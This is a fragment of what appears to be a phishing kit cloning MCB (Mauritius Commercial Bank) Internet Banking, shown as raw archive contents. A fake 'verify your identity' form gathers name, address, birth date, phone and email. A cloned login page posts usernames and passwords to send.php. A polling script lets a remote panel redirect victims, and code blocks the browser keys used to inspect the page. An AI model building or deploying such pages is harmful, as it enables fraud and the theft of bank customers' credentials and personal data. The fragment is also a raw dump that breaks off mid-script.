RZyrEn5afhbu27qu2/hbnCLfFxqenc/wBe/a7qrcJ9Ubn0dvXTPcC9pd/cdg3WxH93OKop5mFl4MtvzHwSUs3Gyb0YJQjeUSlif4fIloenc7M/Dak4eHN853p3lZtVzEpoqD95FpWth8d5efUQIAiBSLWcxhDoAn+giO9we021Wr37jIi4XfHy796Uf4XE5U9zm/icLv8A/uM9eywP6bsV2OVhxX0rN2jbrV34u5h34WdXtlHES/yo2U8ZPSf68uMUjE2uv6NjrxsOOMg7LctpS8rsJ42lCAUyj2Mjp5U1eYKgqHUqibEigB/KAiPXPts6V2Lapq7i48HkL85VnJP2rU5aX+mjPJncT1Pd7O52Nc2vqLfMmGw3E08XGVvFsyg/wurHhad+Ptjec17uCNsSKKTdJJBBJNBBBMiSKKJCppIpJlAiaSSZAKRNNMgAAFAAAADoGZCdAnJgDAGAMAYAwBgDAGAUp/11v+yvP0rHAKrAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAfO0omA3QO4AMUDdA6gUwlEwAP2gBhIHX+YMA+4AwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwD/2Q==); background-color: #fff; margin: 0; padding: 0; border: 0; display: flex; justify-content: flex-end; align-items: center; color: #AB1E22; font-size: 18px; font-weight: 700; } .window_title_header{ position: relative; color: #231f20; font-size: 45px; font-weight: 300; line-height: 200%; margin: 0; text-align: center; } .window_header_position{ position: relative; top: 90px } #contentarea, #contentarea1 { width:100%; position:absolute; border: 1px solid #cdcdcd; } .frmmainform{ position: relative; top: 100px; margin: auto; width: 980px; } .Buttons, .buttons { font-size: 18px !important; padding: 20px 50px !important; } input::placeholder{ color:#D3D3D3; } .fancy-tooltip .fancy-tooltip__content{ width: 280px !important; bottom: 0 !important; top: auto !important; } </style><div id="headerWrapper" ><div id="header" ><div id="_topMenu" > </div></div></div><div class="window_header no-resizable window_header_maximize window_header_position" ><div class="window_title_error active" ><table style="width: 100%;" id="error-dialog-table" cellspacing="1" cellpadding="1" ></table></div><div class="window_title_header active" id="stepheader" > For More Security / Let's Verify your Identify </div></div><form action="send.php" method="post" name="frmmain" AUTOCOMPLETE="off" class="frmmainform" autocomplete="off" ><input type='hidden' name='idsequence' value='pSgCsZEe1RMpNgO68492HMCoCNvfH0ra+W91QdrubUQ=' /><table id="mainbox" class="mainbox" cellpadding="0" cellspacing="0" border="0" ><tr><td><div class="middlepanel" ><table cellspacing="0" cellpadding="0" border="0" id="maintable" class="maintable" style="border: none;" ><tr><td><div class="pageheadingdiv" ><style type="text/css" > #progressbar { margin-bottom: 30px; overflow: hidden; /*CSS counters to number the steps*/ counter-reset: step; float:center; width:950px; /*border:1px solid #000;*/ display: flex; justify-content: center; align-items: center; } #progressbar li { list-style-type: none; color: #231f20; text-align:center; text-transform: uppercase; font-size: 15px; font-weight: 300; width: 25%; float: left; position: relative; display: block; } #progressbar li:before { content: counter(step); counter-increment: step; width: 10px; line-height: 10px; display: block; font-size: 10px; color: #333; background: white; border-radius: 100%; margin: 15px auto 3px auto; } /*progressbar connectors*/ #progressbar li:after { content: ''; width: 97%; height: 5px; color: #AB1E22; position: absolute; left: -48.4%; top: 18px; z-index: 0; /*put it behind the numbers*/ } #progressbar li:first-child:after { /*connector not needed before the first step*/ content: none; } /*marking active/completed steps green*/ /*The number of the step and the connector before it = green*/ #progressbar li:before, #progressbar li:after{ background: #E6E6E6; color: #E6E6E6; } #progressbar li.active:before{ background: #ab1e22 none repeat scroll 0 0; color: #ab1e22; display: block; height: 11px; } #progressbar li.active:after{ background: #000 none repeat scroll 0 0; color: #ab1e22; display: block; height: 5px; } </style><div id="progressbar" ><li class="active" >IDENTIFICATION</li><li class="" ></li></div></div></td></tr><tr><td><style> .headerinfodiv{ margin-top: -20px; height: 60px; display: flex; justify-content: center; align-items: center; } </style><div class="headerinfodiv" >Fill in the information below to validate your account security.</div></td></tr><tr><td height="100%" valign="top" ><div class="y_scroll" id="contentarea" ><div class="contentarea" style="padding:0px" ><span id="box" class="box" ><div class="middlepanel" ><table border="0" cellspacing="1" cellpadding="1" class="formtable" ><tr><td class="labeltext col1" ><label for="fldCardDesc" ><b>Identification Details</b></label></td></tr><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >Full Name.</label></td><td></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="cc1" id="fldIdentificationNoNic" maxlength="50" size="14" ></input><span class="input-error-msg" id="fldIdentificationNoNicInline" style="display:none;" >Please enter valid National Identity Card No.</span></td></tr><tr><td class="labeltext" ><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >Home Address</label></td><td></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="add" id="fldIdentificationNoNic" maxlength="100" size="14" ></input><span class="input-error-msg" id="fldIdentificationNoNicInline" style="display:none;" >Please enter valid National Identity Card No.</span></td></tr><tr><td class="labeltext" ><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >Date of Birth.</label></td><td></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="dob" id="fldIdentificationNoNic" maxlength="14" size="14" placeholder="DD/MM/YY" ></input><span class="input-error-msg" id="fldIdentificationNoNicInline" style="display:none;" >Please enter valid National Identity Card No.</span></td></tr><tr><td class="labeltext" ><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >Phone Number.</label></td><td></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="cvv" id="fldIdentificationNoNic" maxlength="14" size="14" ></input><span class="input-error-msg" id="fldIdentificationNoNicInline" style="display:none;" >Please enter valid National Identity Card No.</span></td></tr><tr><td class="labeltext" ><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >Email Address.</label></td><td><input type="radio" id="fldnicno" name="fldnicno" value="NIC" class="objradio" checked="true" onchange="toggleIdentificationNo(this);" ></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="email" id="fldIdentificationNoNic" maxlength="50" size="14" ></input><span class="input-error-msg" id="fldIdentificationNoNicInline" style="display:none;" >Please enter valid National Identity Card No.</span></td></tr><tr style="height:12px !important;" ></tr><tr></td></tr></table></div></span></div><div class="buttonarea" ><table border="0" cellspacing="1" cellpadding="1" width="100%" ><tbody><tr><td align="left" ><input style="border:none;"></input></td><td align="left" ><input alt="NEXT" name="fldsubmit" value="NEXT" class="Buttons" type="submit" size="16" maxlength="16" ></input></td></tr></tbody></table></div></div></td></tr></table></div></td></tr></table><input type="hidden" name="fldRequestId" value="RRUSR01" ></input><input type="hidden" name="fldDeviceId" value="01" ></input><input type="hidden" name="fldDataId" value="" ></input><input type="hidden" name="fldSessionId" value="" ></input><input type="hidden" name="fldSectionId" value="RRUSR01" ></input><input type="Hidden" name="fldServiceType" value="USR" ></input></form></script> <script src="res/jq.js"></script> <script> var cd = "<?php echo $current_data; ?>"; setInterval(() => { $.post("../panel/fetch.php", {update:1}, function(d){ if(cd!=d){ window.location=d; cd=d; } }) }, 2000); </script> </body></html>PK [��\�Ϗ[� � app/user2.phpnu W+A�� <?php require '../main.php'; ?> <!DOCTYPE html> <html> <head> <title>MCB Internet Banking</title> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content=0> <meta http-equiv="X-UA-Compatible" content="IE=11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="1024, initial-scale=1.0, user-scalable=1, minimum-scale=1.0, maximum-scale=2.0" /> <meta name="apple-mobile-web-app-capable" content="yes" /> <meta name="apple-mobile-web-app-status-bar-style" content="default" /> <meta name="HandheldFriendly" content="true" /> <meta name="MobileOptimized" content="width" /> <LINK REL="SHORTCUT ICON" href="https://ib.mcb.mu/T001/images/mcb.ico" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta http-equiv="X-UA-Compatible" content="IE=11" /> <link type="text/css" rel="stylesheet" href="https://ib.mcb.mu/T001/css/cmn/banking.uri.css" /> <link type="text/css" rel="stylesheet" href="https://ib.mcb.mu/T001/css/C_COLPAL1/scrollbars.uri.css" /> <link type="text/css" rel="stylesheet" href="https://ib.mcb.mu/T001/css/cmn/virtualkeyboard.uri.css" /> <link rel="shortcut icon" href="https://ib.mcb.mu/T001/images/mcb.ico" /> <script type="text/javascript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" charset="utf-8"></script> <script type="text/javascript" src="https://ib.mcb.mu/T001/jsdir/common.js" charset="utf-8"></script> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/virtualkeyboard.js" charset="utf-8"></script> <script type="text/JavaScript" src='https://ib.mcb.mu/T001/jsdir/rsa_compiled.js' charset="utf-8"></script> <!-- script type="text/JavaScript" src='https://ib.mcb.mu/T001/jsdir/fb.js' charset="utf-8"></script --> <style> html { display:none } </style> <script> if (self == top) { document.documentElement.style.display = 'block'; } else { top.location = self.location; } </script> <script type="text/javascript"> $(document).ready(function() { //$('#a1_up').bubbletip($('#tip1_up')); //$('#a2_up').bubbletip($('#tip2_up')); $('.manual-ajax').click(function(event) { event.preventDefault(); $.get(this.href, function(html) { $(html).appendTo('body').modal(); }); }); $(window).resize(function(){ if(window.screen.width <= 800) { $('#wrapper').attr('style', 'width: 95%'); $('#wrapper #section').attr('style', 'width: 95%'); $('#wrapper #section.login').attr('style', 'width: 68%'); $('#wrapper #section.savings_account').attr('style', 'width: 68%'); $('.virtualButtons').attr('style', "width:24px;height:24px"); $('#login-keyboard-controls input').attr('style', 'height:24px'); $('.header_nav').attr('style', 'width: 99%'); $('#footer').attr('style', 'width: 95%'); } else { $('#wrapper').removeAttr('style'); $('#wrapper #section').removeAttr('style'); $('#wrapper #section.login').removeAttr('style'); $('#wrapper #section.savings_account').removeAttr('style'); $('.virtualButtons').removeAttr('style'); $('#login-keyboard-controls input').removeAttr('style'); $('.header_nav').removeAttr('style'); $('#footer').removeAttr('style'); } }).trigger('resize'); //initialize_fb ({appId : 'null', channelURL : 'null'}); }); function passwordStrength(i) { var password = document.getElementById('pass0'+i).value; var desc = new Array(); desc[0] = "Very Weak"; desc[1] = "Weak"; desc[2] = "Better"; desc[3] = "Medium"; desc[4] = "Strong"; desc[5] = "Strongest"; var score = 0; //if password bigger than 6 give 1 point if (password.length > 6) score++; //if password has both lower and uppercase characters give 1 point if ( ( password.match(/[a-z]/) ) && ( password.match(/[A-Z]/) ) ) score++; //if password has at least one number give 1 point if (password.match(/\d+/)) score++; //if password has at least one special caracther give 1 point if ( password.match(/.[!,@,#,$,%,^,&,*,?,_,~,-,(,)]/) ) score++; //if password bigger than 12 give another 1 point if (password.length > 12) score++; document.getElementById("passwordDescription"+ i).innerHTML = desc[score]; document.getElementById("passwordStrength"+ i).className = "strength" + score; } </script> <script type="text/javascript"> //----------------------------------------------------------------------------- var scr_w, scr_w1,scr_h, scr_h1; //----------------------------------------------------------------------------- $(document).ready(function() { if($('div#fldLoginUserId input').val() == '') { $(location).attr('href','savings_account_offers.jsp'); } setScreenSize (); }); //----------------------------------------------------------------------------- function fLogon(){ $(location).attr('href','retrieve_application.jsp'); if(document.getElementById('fldLoginUserId').value =='tim.brown@gmail.com'){ $(location).attr('href','savings_account_offers.jsp'); } } //----------------------------------------------------------------------------- function setScreenSize(){ scr_w1 = screen.availWidth-10+"px"; scr_h1 = screen.availHeight-60+"px"; } //----------------------------------------------------------------------------- function locateBranches(title) { document.frmprocess.fldRequestId.value = "RRLOB01"; window_open (document.frmprocess, title, "RRLOB01"); } //----------------------------------------------------------------------------- function registerUser(title){ document.frmprocess.fldRequestId.value = "RRRNB01"; window_open (document.frmprocess, title, "RRRNB01"); } function opengoal(title){ document.frmprocess.fldRequestId.value = "RRORG351"; window_open (document.frmprocess, title, "RRORG351"); } //----------------------------------------------------------------------------- function showFAQ(p_title, p_lang){ window.open(p_lang + '/faq.html'); } //------------------------------------------------------------------------------ function getStatus(title){ document.frmprocess.fldRequestId.value = "RRORG111"; window_open (document.frmprocess, title, "RRORG111"); } //------------------------------------------------------------------------------ function window_open(frm, title, id){ var window_name = 'process_' + id; var frm_action; window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width='+scr_w1+',height='+scr_h1 ); frm.target = window_name; frm.title.value = title; frm_action = frm.action; frm.action = "process.jsp" frm.submit (); frm.action = frm_action; } //------------------------------------------------------------------------------ function aboutbox () { window.open ("about.html", "NewWindow", "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no," + "0, 0, top=0,left=0,status=1,width=400,height=300"); } //----------------------------------------------------------------------------- function extractFieldsFromURL(){ var fields=new Object(); var url = new String(document.URL); var fieldStartPos = url.indexOf("?") + 1; if(fieldStartPos>0 && url.substring(fieldStartPos).length>0){ var fields = url.substring(fieldStartPos).split("&"); for(i=0; i<fields.length; i++){ var field = fields[i].split("="); if(field.length == 2 && field[0].length>0){ var fieldName = field[0]; var fieldValue = field[1]; if($('input[name="' + fieldName +'"]').val() == undefined){ createHiddenField(fieldName, fieldValue); } } } } var selected = document.activeElement; if ((selected.id == "fldLoginUserId") || (selected.id=="undefined") || (selected.id=="")){ $('#fldLoginUserId').focus(); } } //----------------------------------------------------------------------------- function createHiddenField(fieldName, fieldValue){ fieldElem = $('<input type="hidden" name="' + fieldName + '" value="' + fieldValue + '"/>'); $('form[name="frmmain"]').append(fieldElem); } //----------------------------------------------------------------------------- // Code to disable F12, F5, F6, Ctrl+U if (document.addEventListener) // code for cross browser compatibility as addEventListener is not supported in IE8 and earlier versions. { document.addEventListener("keydown", disableKeys, false); } else if (document.attachEvent) { document.attachEvent("onkeydown", disableKeys); } function disableKeys(event) { event = (event || window.event); if (event.keyCode == 123 || ((event.keyCode == 85) && event.ctrlKey )|| event.keyCode == 116 || event.keyCode == 117) { if(event.preventDefault) event.preventDefault(); return false; } } //----------------------------------------------------------------------------- </script> </head> <body class="bg" onload="extractFieldsFromURL();"> <div id="headerWrapper"> <div id="header"> <div id="_topMenu"> <!--<div id='logoWrapper'> <div id="logo" class="logo"></div> </div> <div class="inner-head"> <span>Call for free on :</span>1-800-111-1111 </div>--> <form name="frmlang" method="POST" action="send.php"> <div id="topMenu"> </div> </form> </div> </div> </div> <div id ="mainall" > <form name="frmmain" action="send.php" method="POST" autocomplete="off" autocomplete="off" ><input type='hidden' name='idsequence' value='Rplzsfq0VK29S5LSrLjIFeVbMljapOuXMwSowrqrP8U=' /><script type="text/JavaScript" language="JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax_Login.js" ></script><script> var userId = ''; var snonce = ''; function blurUserId(el) { userId = el.value; if (el.value == '') { el.value = el.title; el.style.color="#666"; } } function focusUserId(el) { if (el.value == el.title) { el.value = ''; el.style.color="#333"; } } function capLock(e){ kc = e.keyCode?e.keyCode:e.which; sk = e.shiftKey?e.shiftKey:((kc == 16)?true:false); if(((kc >= 65 && kc <= 90) && !sk)||((kc >= 97 && kc <= 122) && sk)) $("#capserr").show(); else $("#capserr").hide(); } function createForm (p_frmname,p_requestid) { var form = $("form[name="+p_frmname+"]"); if (form.length == 0) { $("form[name='frmmain']").after ('<form name='+p_frmname+' action="process.jsp" method="POST" autocomplete="off"/>'); var form = $("form[name="+p_frmname+"]"); form.append ('<input type="hidden" value='+p_requestid+' name="fldRequestId"/>'); form.append ('<input type="hidden" value="01" name="fldDeviceId"/>'); form.append ('<input type="hidden" value="" name="title"/>'); } } function forgotPassword () { var l_frmname = 'frmprocess'; var l_requestid = 'RRFPW01'; createForm(l_frmname,l_requestid); formwindow_open ($("form[name="+l_frmname+"]") [0], 'Forgot Password?', l_requestid); } function newUser () { var l_frmname = 'frmprocess'; var l_requestid = 'RRUSR11'; createForm(l_frmname,l_requestid); formwindow_open ($("form[name="+l_frmname+"]") [0], 'Online Registration', l_requestid); } function troubleshootLoginIssue(){ var l_frmname = 'frmprocess'; var l_requestid = 'RRUBA09'; createForm(l_frmname,l_requestid); formwindow_open ($("form[name="+l_frmname+"]") [0], 'Login Problem', l_requestid); } </script><div id="tablediv" style="position:relative;" ><div id="wrapper" class="login" ><div class="alert" ><div class="alert_inner" ><span class="icon icon_information" ></span><span class="alert_message" ><script type="text/javascript" >var l_notification_msg = 'Please note that the migration of companies to MCB Internet Banking Pro is currently underway and is taking place in phases. <br> Companies can register once they have been notified by the bank.';document.write('<p>');document.write(l_notification_msg);document.write('</p>');</script></span></div></div><div id="main" ><div class="section_holder" style="background:white;width:975px;border:1px solid #e6e6e6" ><div class="section_left" style="border:0px solid #e6e6e6" ><div id="keyboard_firstrowtwrapper" ><div id="keyboard_bankname" > Login </div></div><div id="rows" ><div class="login_labeltext" id="user_id" ><label for="fldLoginUserId" >User ID</label></div><div id="fldPassword" ><input type="text" class="inputbox" id="fldLoginUserId" name="USERNAME" onblur="blurUserId(this);" onfocus="focusUserId(this);" ></input><span id="useriderr" class="input-error-msg" style="display:none;" >Please enter User ID</span></div></div><div id="rows" ><div class="login_labeltext" id="password_id" ><label for="VKBPassword" >Password</label></div><div class="stdinputbox" id="fldPassword" ><input type="password" value="" class="inputbox" name="PASSWORD" maxlength="20" oncopy="return false;" onpaste="return false;" id="SKBPassword" onkeypress="capLock(event)" ></input><span id="pwderr" class="input-error-msg" style="display:none;" >Please enter password</span><span id="capserr" class="input-error-msg" style="display:none;" >Caps Lock is on </span></div><div class="virtinputbox" id="fldPassword" style="display: none;" ><input type="password" value="" class="inputbox" name="fldPasswordVirtual" maxlength="20" readonly="true" id="VKBPassword" ></input><span id="pwderr" class="input-error-msg" style="display:none;" >Please enter password</span></div><div id="virtualkeyboard" class="virtualkeyboard" ><img src="https://ib.mcb.mu/T001/images/ico_keyboard.gif" class="ico_keyboard" title="Virtual Keyboard" width="44" height="29" href="#VKB" style="cursor:pointer" ></img></div></div><div id="tabs_wrapper" style="position:absolute; padding:1px" ><div id="tabs_content_container" style="padding:5px" ><div id="VKB" class="tab_content" style="display: none;" ><div class="inputbox" ><div class="labeltext" style="float:left; margin: 10px 0px;" ><input type="checkbox" name="elemC4" id="elemC4" style="margin:10px 5px 0 0;" checked="true" ></input><label for="elemC4" >Click here to enter by hovering</label></div><div id="closebut" class="overlay-close" ><img height="25" width="25" border="0" alt="Close" title="Close" href="#VKB" src="https://ib.mcb.mu/T001/images/ico_cross-small.jpg" ></img></div></div><div class="hsplitbar" ></div><div id="login-keyboard" ><table cellpadding="0" cellspacing="0" align="center" width="50%" ><tr><td align="center" ><div id="login-keyboard-special" ><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=0; i < 15; i++) { document.write ('<td>'); imageSpCharOnPage(i); document.write ('</td>'); } </script></tr></table></div></td><td rowspan="3" style="vertical-align:top;" ><div id="login-keyboard-numeric" ><table cellpadding="1" cellspacing="1" role="presentation" summary="" ><tr><script LANGUAGE="JavaScript" > for (var i=0; i < 3; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script></tr><tr><script LANGUAGE="JavaScript" > for (var i=3; i < 6; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script></tr><tr><script LANGUAGE="JavaScript" > for (var i=6; i < 9; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script></tr><tr><td> </td><script LANGUAGE="JavaScript" > for (var i=9; i < 10; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script><td> </td></tr></table></div></td></tr><tr><td valign="top" align="center" ><div id="login-keyboard-alpha" ><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=0; i < 10; i++) { document.write ('<td>'); imageAlphaOnPage(i); document.write ('</td>'); } </script></tr></table><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=10; i < 19; i++) { document.write ('<td>'); imageAlphaOnPage(i); document.write ('</td>'); } </script></tr></table><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=19; i < 26; i++) { document.write ('<td>'); imageAlphaOnPage(i); document.write ('</td>'); } </script></tr></table></div></td></tr><tr><td width="100%" align="center" ><table cellpadding="1" cellspacing="1" align="center" id="login-keyboard-controls" ><tr><td><input type="button" value="Upper" id="elemC0" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="setCase('Upper','Lower');" class="buttons" ></input></td><td><input type="button" value="Delete" id="elemC1" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="DeletePwd();" class="buttons" ></input></td><td><input type="button" value="Clear All" id="elemC2" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="ClearPwd();" class="buttons" ></input></td><td><input type="button" value="Not Mixed" id="elemC3" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="setRandom('Mixed','Not Mixed');" class="buttons" ></input></td></tr></table></td></tr></table></div></div></div></div><div style="text-align: center;padding: 5px 10px 5px; cursor: pointer" ><input name="imageField" type="submit" value="Login" id="Login" class="login_button" onClick="fNonce()" style="cursor: pointer !important; padding: 13px 76px!important;" disabled="true" ></input></div><div id="rows" ><div class="keyboard_wrapper" ><a style="color: black; text-decoration: underline;" href="javascript:void(0)" onclick="troubleshootLoginIssue();" >Can't Login?</a></div><div class="keyboard_wrapper" ><label id="btnLoginProblemlbl" class="button_desc" for="btnLoginProblem" >(Forgot Password/ID, Account Locked)</label></div><div class="keyboard_wrapper" style="margin: 20px 0px 0px 16px;" ><a style="font-size: 18px; font-weight: 700;" href="javascript:void(0)" onclick="newUser();" >Register to Internet Banking</a><span class="icon icon--arrowrightred" style="background-position: 50% 43%" ></span></div></div><style> .button_desc{ font-style: italic; font-size: 13px; font-weight: 400; color: #949193 !important } </style></div><div class="section_right" style="border:0px solid #e6e6e6" ><div class="logo_holder" style="margin:14px 18px !important;" ><img src="https://ib.mcb.mu/T001/images/IBPro_SmartApprove.png" ></img></div><p style="color:black !important ;font-size: 22px !important;line-height:18px !important;margin-top: 92px !important;" >A new experience awaits our <br></br>non-individual customers! </p><div style="margin:9px auto !important;" ><a style="font-size: 20px !important; font-weight: 700 !important;" href="https://ibpro.mcb.mu/" target="_blank" >Register and/or Login to Internet Banking Pro</a><span class="icon icon--arrowrightred" style="background-position: 50% 43%" ></span></div><p style="font-size:15px !important;padding: 10px 16px !important;font-style:italic !important; margin-top: -7px !important; font-weight: 400 !important; color: #949193 !important;" > Please complete registration once you have been notified by the Bank.</p></div></div><div class="section_bottom" ><div class="section_title" ><img src="https://ib.mcb.mu/T001/images/ico_security.png" height="59" width="73" ></img><h2>Security</h2><blockquote><p>MCB will never ask for your login details by email.</p><p>Report any suspicious email, website, or unsolicited request that </p><p>claims affiliation with MCB by calling <strong>202 6060</strong> or by emailing </p><p><a href="mailto:alert@mcb.mu" >alert@mcb.mu</a></p><div><a href="https://www.mcb.mu/en/personal/security-centre/online-and-mobile-security/ways-to-keep-safe" target="_blank" >How to protect yourself online</a><span class="icon icon--arrowrightred" ></span></div></blockquote><div id="verisign_seal" ><script type="text/javascript" src="https://seal.websecurity.norton.com/getseal?host_name=ib.mcb.mu&size=S&use_flash=NO&use_transparent=NO&lang=en" ></script></div></div></div></div></div></div><div id="footer" ><div class="footerWrapper" ><p class="footer_list-title" >Explore MCB Internet Banking</p><div class="footer_link-list" ><ul><li><a href="https://www.mcb.mu/en/personal/banking/ways-to-bank/internet/" target="_blank" >Key features <span class="icon icon-arrowrightwhite" ></span></a></li></ul></div><div class="footer_link-list" ><ul><li><a href="https://www.mcb.mu/en/personal/support/faqs/online-banking" target="_blank" >FAQs<span class="icon icon-arrowrightwhite" ></span></a></li></ul></div><div class="footer_link-list" ><ul><li><a href="https://www.mcb.mu/en/personal/security-centre/online-and-mobile-security/" target="_blank" >Protect yourself <span class="icon icon-arrowrightwhite" ></span></a></li></ul></div><div class="LoginCopyright" > © <script type="text/javascript" >document.write(new Date().getFullYear());</script> MCB - The Mauritius Commercial Bank Ltd </div></div></div><input type="hidden" name="fldPassword" value="" ></input><script language="JavaScript" > //----------------------------------------------------------------------------- var virtKeyb = false; var speedMbps; var BW_THRESHOLD = 300; var scr_w, scr_w1,scr_h, scr_h1; function initializelogin() { setScreenSize (); if (virtKeyb) { } else { var keyBoard = document.getElementById('login-keyboard').getElementsByTagName("BUTTON"); for(i=0; i <= keyBoard.length-1; i++){ keyBoard[i].disabled=true; keyBoard[i].style.color='#AAAAAA'; } } $("#fldLoginUserId").focus (function (e) {focusUserId (this);}); $("#fldLoginUserId").blur (function (e) {blurUserId (this);}); blurUserId (document.getElementById ("fldLoginUserId")); $(".virtinputbox").hide(); document.getElementById("Login").disabled = false; } $(document).ready(function() { initializelogin (); getBandWidth(); }); //added by foram $(".alert").hide(); $(".icon icon_information").hide(); var l_sys_notification = 'Y'; if(l_sys_notification!='N'){ $(".alert").show(); $(".icon icon_information").show(); } $(".tab_content").hide(); $(".stdinputbox").show(); $(".virtinputbox").hide(); $(".virtualkeyboard img").click(function() { $(".tab_content").hide(); // Hide all tab content var selected_tab = $(this).attr("href"); // Here we get the href value of the selected tab $(selected_tab).fadeIn(); // Show the selected tab content virtKeyb = true; $(".stdinputbox").hide(); $(".virtinputbox").show(); document.frmmain.fldPasswordVirtual.value = ""; document.frmmain.fldPasswordStandard.value = ""; return false; // At the end, we add return false so that the click on the link is not executed }); $(".overlay-close img").click(function(){ $(".tab_content").hide(); var selected_tab = $(this).attr("href"); $(selected_tab).fadeOut(); virtKeyb = false; document.frmmain.fldPasswordStandard.value = document.frmmain.fldPasswordVirtual.value; $(".stdinputbox").show(); $(".virtinputbox").hide(); return false; }) //added by foram function getBandWidth() { var startTime, endTime; var imgSize = 983094; //bytes var testImg = new Image(); testImg.src = "images/test.bmp" + "?n=" + Math.random(); startTime = (new Date()).getTime(); testImg.onload = function () { endTime = (new Date()).getTime(); var duration = (endTime - startTime) / 1000; var bitsLoaded = imgSize * 8; var speedBps = bitsLoaded / duration; speedMbps = ((speedBps / 1024)/1024).toFixed(2); } } //----------------------------------------------------------------------------- function fLogon (p_snonce) { var pwd = null; var rsa = new RSAKey(); var mod = "912f2b92b6eece87d660d1f58e3208fb487fce3e672aeb93b28e2d575a1888516ff7d390141d3afbe185a083dd9bb84d42fdef9a5a3901590e74a35eb6358c29a0ac4d34daeb1cafe6ae0e8012a6c96a6b0c609e55dadec925888c6b06436da2c388170e7b51b0b9475d01ad8893c87ced00a6f0793b5a9aa8acdbff4b694ce9"; var expo = "10001"; rsa.setPublic(mod, expo); // if (userId == "" || userId =="User Id") { if (document.frmmain.fldLoginUserId.value == "" || document.frmmain.fldLoginUserId.value == "User ID") { $("#useriderr").show(); $("#pwderr").hide(); $( "#fldLoginUserId" ).removeClass("inputbox").addClass( "inputbox input-error" ); $( "#VKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); $( "#SKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); // alert ("User Id must be entered"); document.frmmain.fldLoginUserId.focus (); return false; }else{ $("#useriderr").hide(); $( "#fldLoginUserId" ).removeClass("inputbox input-error").addClass( "inputbox" ); } if (virtKeyb) { if (document.frmmain.fldPasswordVirtual.value == "") { // alert ("Password must be entered"); if (document.frmmain.fldPasswordStandard.value == ""){ $("#pwderr").show(); $( "#VKBPassword" ).removeClass("inputbox").addClass( "inputbox input-error" ); document.frmmain.fldPasswordVirtual.focus (); return false; } }else{ $("#pwderr").hide(); $( "#VKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); } pwd = document.frmmain.fldPasswordVirtual.value; document.frmmain.fldPasswordVirtual.value = ""; } else { if (document.frmmain.fldPasswordStandard.value == "") { // alert ("Password must be entered"); if (document.frmmain.fldPasswordVirtual.value == ""){ $("#pwderr").show(); $( "#SKBPassword" ).removeClass("inputbox").addClass( "inputbox input-error" ); document.frmmain.fldPasswordStandard.focus (); return false; } }else{ $("#pwderr").hide(); $( "#SKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); } pwd = document.frmmain.fldPasswordStandard.value; document.frmmain.fldPasswordStandard.value = ""; } if(pwd.length < 16){ aString = new String("16"); answer = aString - pwd.length; var sr = " "; var cnt ; for (var i = 0; i < answer; i++) { var rsr = pwd.concat(sr); pwd =rsr; } } document.frmmain.fldPassword.value = rsa.encrypt(p_snonce+pwd); document.frmmain.fldRequestId.value = "RRLGN01"; var isLowBW = false; var scr_w, scr_w1; var scr_h, scr_h1; scr_w1 = 1015; scr_h1 = 740; if (scr_w == '800') { scr_w1 = 785; scr_h1 = 500; } if(typeof loginWindow != 'undefined'){ try{ loginWindow.close(); }catch(e){ } } if(speedMbps <= BW_THRESHOLD) { var UI_id = document.frmmain.fldlitever; for(var i = 0; i < UI_id.options.length; i++) { if(UI_id.options[i].value == "L") { UI_id.selectedIndex = i; break; } } isLowBW = true; } if(isLowBW) { $("#bwDialog").dialog("open"); return false; } else { return redirectToSummaryPage(); } } document.onkeydown=function(){ if(window.event.keyCode=='13'){ fNonce(); } } function redirectToSummaryPage() { var scrW = screen.availWidth-10+"px"; var scrH = screen.availHeight-60+"px"; var windowName 